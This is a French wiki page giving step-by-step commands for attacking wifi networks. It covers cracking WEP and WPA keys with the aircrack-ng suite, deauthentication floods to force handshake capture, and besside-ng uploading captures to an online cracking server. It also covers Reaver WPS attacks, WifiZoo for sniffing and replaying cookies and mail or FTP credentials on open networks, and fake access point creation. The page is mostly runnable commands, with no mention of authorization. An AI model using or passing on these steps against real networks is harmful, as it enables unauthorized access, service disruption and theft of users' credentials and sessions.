« Wifi » : différence entre les versions

De UnixWiki
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
 
(Aucune différence)

Dernière version du 14 juin 2012 à 19:15

Tester si le driver de la carte wifi supporte l'injection de packets

 #aireplay-ng -9 mon0
 21:15:52  Trying broadcast probe requests...
 21:15:52  Injection is working!
 21:15:53  Found 4 APs

AirCrack - WEP

Dans un terminal:

 Airmon-ng start [interface]
 Airodump-ng [interface]
 Airodump-ng --channel [channel cible] --write wep --bssid [BSSID cible] [interface] **Attention la commande tourné

Dan un nouveau terminal:

 Aireplay-ng -1 0 -a [BSSID cible] [interface]
 Attention wait for the recognize router :-) 

Dans un nouveau terminal:

 Aireplay-ng -3 -b [BSSID cible] [interface]
              **Attention not close this terminal **                             


Dans un nouveau terminal:

 Aircrack-ng wep-01.cap

AirCrack - WPA

Passer la carte wifi en mode monitor (créee une nouvelle interface mon0)

 #airmon-ng start wlan0

Ecouter le réseau en mode WPA

 #airodump-ng --encrypt wpa mon0

Cibler un SSID précis (-c channel d'écoute, --bssid le point d'accès, -w fichier de sortie, --ignore-negative-one à utiliser sur toutes les commandes en cas du bug airodump channel: -1)

 #airodump-ng -w out --encrypt wpa -c 1 --bssid 00:1F:9F:BB:AF:05 --ignore-negative-one mon0

Pour réussir un crack wpa, il est primordial qu'une station soit connectée, en effet le 4 way handshake (littéralement la poignée de mains) nécessaire au crack ne peut etre capturé QUE si une station est connectée au point d'accès.

Préparez votre attaque aireplay-ng. Ouvrir deux nouveaux shells. Dans le premier, préparez la commande

 #aireplay-ng -0 0 -a $bssid -c $station --ignore-negative-one mon0

Dans le second, préparez la commande

 #aireplay-ng -0 0 -a $bssid --ignore-negative-one mon0

Le paramètre -0 signifie une attaque déauth, le 0 qui suit signifie que l'envoi des paquets de déauth sera infini, il faudra donc arrêter l'attaque après quelques instants avec ctrl + c. Vous pouvez spécifier un délai, par exemple aireplay-ng -0 5 , et l'attaque s'arrêtera après l'envoi de 5 paquets de déauth. Quand les commandes sont prêtes, lancez les dans chaque shell, patientez quelques secondes et stoppez les.

Si l'attaque a réussi, vous devriez avoir une bonne surprise en revenant dans votre shell airodump-ng. L'apparition du WPA handshake en haut à droite de la fenetre indique la réussite de l'attaque. Cela varie suivant la qualité du signal reçu.

Le handshake est maintenant dans le fichier de capture, vous pouvez stopper airodump. Vous devez maintenant vous armer d'un bon fichier dictionnaire. Le crack peut commencer:

 #aircrack-ng -w nom-du-fichier-dictionnaire nom-du-fichier-de-capture

"-w -" si on n'a pas de dictionnaire

AirCrack - Divers

Attaquer un réseau Wifi et cracker la clef online

 besside-ng -s wpa.darkircop.org mon0

Reaver

 #reaver -i mon0 -b ${BSSID} -vv

WifiZoo

Télécharger ici

WifiZoo est un outil permettant de récupérer des cookies sur des réseaux wifi non encryptés (opn), ainsi que diverses autres informations intéressantes: POP3 Credentials, FTP Datas, MSN Datas, SMTP Datas. Le résultat du sniffing d'informations est affiché sur une interface web. La réutilisation des cookies est d'une facilité déconcertante, puisque Wifizoo intègre un serveur proxy spécialement dédié à la réutilisation des cookies que le programme va lui meme forger automatiquement.

Penser à modifier le fichier wifizoo.py est changer la variable "conf.iface = 'wlan0'" par sa carte wifi.

Lancer wifizoo:

 #python wifizoo.py -i wlan0

On peut voir que wifizoo lance l'interface web sur le port 8000 du serveur local, et le proxy est accessible sur le port 8080. S'y connecter avec firefox: 127.0.0.1:8000 Puis clic-clic bouton pour voler les cookies :)

Créer un faux point d'accès

 airbase-ng -c "${WIFI_CHANNEL}" -e "${ESSID_NAME}" "${WNIC_NAME}"